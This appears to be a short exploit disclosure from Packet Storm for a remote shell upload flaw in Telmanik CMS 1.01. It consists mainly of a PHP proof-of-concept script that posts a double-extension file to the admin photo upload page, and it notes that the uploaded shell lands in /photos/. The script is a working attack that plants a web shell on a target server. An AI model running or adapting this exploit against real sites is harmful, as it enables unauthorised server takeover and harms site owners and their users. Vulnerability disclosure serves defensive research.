Telmanik CMS version 1.01 suffers from a remote shell upload vulnerability.
c56f47cbdbd567480466a838ad2a346f2ad6aba77864ba331f9655d07cbfa208/*
##########################################################################
Exploit title : telmanik cms v1.01 File Upload
Date : 12/12/2013
Author : JoKeR_StEx
Software Link : http://www.telmanik.com/open-source.php
Tested On : WinXP PRO SP3
CVE : [~]
Version : 1.01
#########################################################################
*/
1) File Upload
P.O.C
<?
# <3Algeria<3
$web = "http://127.0.0.1/telmanik/upload/admin/photo_upload.php";
$dz = curl_init();
$shell = "jxdz.jpg.php";
curl_setopt($dz,CURLOPT_URL,$web);
curl_setopt($dz,CURLOPT_RETURNTRANSFER,true);
curl_setopt($dz,CURLOPT_HEADER,false);
curl_setopt($dz,CURLOPT_VERBOSE,false);
curl_setopt($dz,CURLOPT_POST,true);
$jxarray = array("image1"=>"@".$shell);
curl_setopt($dz,CURLOPT_POSTFIELDS,$jxarray);
$exec=curl_exec($dz);
$end=curl_close($dz);
?>
//The Shell YOu cAn Find it in /photos/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed